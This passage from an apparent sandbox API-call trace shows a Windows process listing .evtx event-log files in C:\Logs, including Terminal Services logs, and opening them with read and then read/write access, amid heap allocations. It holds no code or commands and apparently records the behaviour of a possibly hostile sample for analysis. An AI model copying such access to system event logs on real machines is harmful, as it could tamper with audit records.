InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d220 | out: hHeap=0x20000) returned 1 [0087.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0087.450] AreFileApisANSI () returned 1 [0087.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", lpUsedDefaultChar=0x0) returned 79 [0087.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0087.451] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.451] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.451] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0087.451] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0087.451] AreFileApisANSI () returned 1 [0087.451] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0087.451] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9e) returned 0x8d178 [0087.451] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x8d178, cchWideChar=79 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx") returned 79 [0087.451] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.451] GetFileType (hFile=0x424) returned 0x1 [0087.451] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d178 | out: hHeap=0x20000) returned 1 [0087.451] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0087.451] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0087.452] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0087.452] CloseHandle (hObject=0x424) returned 1 [0087.452] AreFileApisANSI () returned 1 [0087.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0087.452] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9e) returned 0x8c848 [0087.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x8c848, cchWideChar=79 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx") returned 79 [0087.452] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.452] GetFileType (hFile=0x424) returned 0x1 [0087.452] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c848 | out: hHeap=0x20000) returned 1 [0087.452] CloseHandle (hObject=0x424) returned 1 [0087.452] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8b078 [0087.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8b110 [0087.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a2d0 [0087.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a660 [0087.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a2d0 | out: hHeap=0x20000) returned 1 [0087.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b110 | out: hHeap=0x20000) returned 1 [0087.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0087.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0087.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a790 [0087.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ac50 [0087.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a6f8 [0087.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a8c0 [0087.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a6f8 | out: hHeap=0x20000) returned 1 [0087.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ac50 | out: hHeap=0x20000) returned 1 [0087.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0087.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ae18 [0087.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a8c0 | out: hHeap=0x20000) returned 1 [0087.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a9f0 [0087.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ae18 | out: hHeap=0x20000) returned 1 [0087.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a9f0 | out: hHeap=0x20000) returned 1 [0087.527] AreFileApisANSI () returned 1 [0087.527] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0087.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9e) returned 0x8d370 [0087.527] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x8d370, cchWideChar=79 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx") returned 79 [0087.527] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4admin.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc14341c, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcc14341c, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0087.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d370 | out: hHeap=0x20000) returned 1 [0087.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0087.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0087.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0087.559] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.559] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.559] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc1b5b23, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcc1b5b23, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", cAlternateFileName="MI1F5D~1.EVT")) returned 1 [0087.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0087.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0087.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0087.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69300 [0087.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0087.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45e88 [0087.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0087.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8ce30 [0087.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e88 | out: hHeap=0x20000) returned 1 [0087.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d220 [0087.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cae8 [0087.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c7a0 [0087.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cae8 | out: hHeap=0x20000) returned 1 [0087.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d220 | out: hHeap=0x20000) returned 1 [0087.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ce30 | out: hHeap=0x20000) returned 1 [0087.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c7a0 | out: hHeap=0x20000) returned 1 [0087.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0087.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0087.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0087.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0087.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0087.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0087.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d370 [0087.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c458 [0087.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0087.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81bf8 [0087.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0087.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c458 | out: hHeap=0x20000) returned 1 [0087.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81cb0 [0087.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81bf8 | out: hHeap=0x20000) returned 1 [0087.560] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.560] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.560] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.560] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81cb0 | out: hHeap=0x20000) returned 1 [0087.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d370 | out: hHeap=0x20000) returned 1 [0087.560] AreFileApisANSI () returned 1 [0087.560] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", lpUsedDefaultChar=0x0) returned 85 [0087.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0087.560] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.560] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0087.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0087.561] AreFileApisANSI () returned 1 [0087.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 85 [0087.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xaa) returned 0x816f0 [0087.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x816f0, cchWideChar=85 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx") returned 85 [0087.561] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.561] GetFileType (hFile=0x424) returned 0x1 [0087.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x816f0 | out: hHeap=0x20000) returned 1 [0087.561] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0087.561] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0087.562] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0087.562] CloseHandle (hObject=0x424) returned 1 [0087.562] AreFileApisANSI () returned 1 [0087.562] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 85 [0087.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xaa) returned 0x81860 [0087.562] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x81860, cchWideChar=85 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx") returned 85 [0087.562] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.563] GetFileType (hFile=0x424) returned 0x1 [0087.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81860 | out: hHeap=0x20000) returned 1 [0087.563] CloseHandle (hObject=0x424) returned 1 [0087.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c5a8 [0087.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c650 [0087.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cf80 [0087.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8ca40 [0087.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cf80 | out: hHeap=0x20000) returned 1 [0087.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c650 | out: hHeap=0x20000) returned 1 [0087.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c5a8 | out: hHeap=0x20000) returned 1 [0087.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ca40 | out: hHeap=0x20000) returned 1 [0087.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8ced8 [0087.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8ce30 [0087.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d370 [0087.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c5a8 [0087.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d370 | out: hHeap=0x20000) returned 1 [0087.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ce30 | out: hHeap=0x20000) returned 1 [0087.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ced8 | out: hHeap=0x20000) returned 1 [0087.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d178 [0087.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c5a8 | out: hHeap=0x20000) returned 1 [0087.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c8f0 [0087.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d178 | out: hHeap=0x20000) returned 1 [0087.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c8f0 | out: hHeap=0x20000) returned 1 [0087.564] AreFileApisANSI () returned 1 [0087.564] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 85 [0087.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xaa) returned 0x81e20 [0087.564] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x81e20, cchWideChar=85 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx") returned 85 [0087.564] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc1b5b23, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcc1b5b23, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0087.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81e20 | out: hHeap=0x20000) returned 1 [0087.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0087.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0087.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0087.564] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.564] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.564] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd74ac348, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd74ac348, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x2000002, cFileName="Microsoft-Windows-TWinUI%4Operational.evtx", cAlternateFileName="MIA925~1.EVT")) returned 1 [0087.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0087.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69210 [0087.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0087.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45fd8 [0087.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69210 | out: hHeap=0x20000) returned 1 [0087.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0087.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0087.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0087.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0087.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0087.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45fd8 | out: hHeap=0x20000) returned 1 [0087.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0087.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0087.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0087.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0087.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0087.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0087.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0087.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0087.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0087.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0087.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0087.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0087.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0087.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0087.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0087.565] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.565] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.565] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.565] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0087.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0087.565] AreFileApisANSI () returned 1 [0087.565] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx", lpUsedDefaultChar=0x0) returned 51 [0087.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, 